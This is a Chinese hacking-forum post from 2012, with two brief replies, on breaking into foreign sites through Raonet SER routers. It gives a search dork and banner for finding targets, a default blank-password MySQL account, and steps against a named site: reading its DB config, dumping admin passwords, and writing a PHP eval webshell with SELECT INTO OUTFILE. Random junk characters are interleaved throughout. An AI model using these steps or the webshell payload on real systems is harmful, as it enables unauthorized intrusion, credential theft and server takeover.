中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:) P9 h% d3 i* C# R* a$ ]( S
4 K# A+ [8 Z  N/ j
1:google搜索'Raonet Subscriber Ethernet Router'- W2 T7 G+ u$ t2 u, _3 w

( }% I& G2 [1 o* C2 H2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001# k2 j( {" V1 i! s
/ i7 O$ ^5 r- h6 A0 y  j8 t+ y+ {
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
" c) H+ y" p; x2 T2 T( w
5 j$ }5 a" y( C//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......1 p( Y4 n& P  H" V- J' p

- S+ Y- L8 [4 i$ k: j( K
' H4 ~1 E9 }0 A* ?: y* J: T& ~, q$ J4 X7 ?" X( G& `
入侵步骤:
+ N1 U& Q2 ?* h/ x3 X
9 O* y6 z  u3 B! G+ R! W9 c, e1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php0 |: }- E) s% N0 A% b7 O$ \

. {! E. D& K+ J, y( R! m2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc- S% j! v# Z( i$ ~, |. U
3:得到密码后连接,查看GUI管理密码:
3 j2 U) i* Z' m$ f' {3 ?use ser_500$ M9 _4 o  \% q& \, [. T
select id,passwd from user;4 L9 A/ U7 M1 P4 r/ [4 P" s
4:通过数据库写入webshell,执行命令:
# X& c0 `8 L: v9 T5 O; M0 H3 euse mysql;% W9 d" P/ b0 e7 [% A7 T8 M. n+ P
create table ok(cmd TEXT);
* @/ _0 a* Q% ?( H/ k( qinsert into ok values("<?php @eval($_POST[cmd])?>");) f7 W) m) p. Q5 M% b, G9 r& F
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";6 ]2 c. z# }2 m/ T
drop table ok;
& G' X: i+ k, Q0 e6 d
; Z! P  U% t. Y( p1 F1 h5:连接后门shell.php + \9 q! L* F3 P3 p

! }) n0 R" K8 Z' \. d1 M6. 搞定!7 y0 f# O/ M9 Y3 ]: r$ C8 k# {
/ u1 g1 b# a% U! h

作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2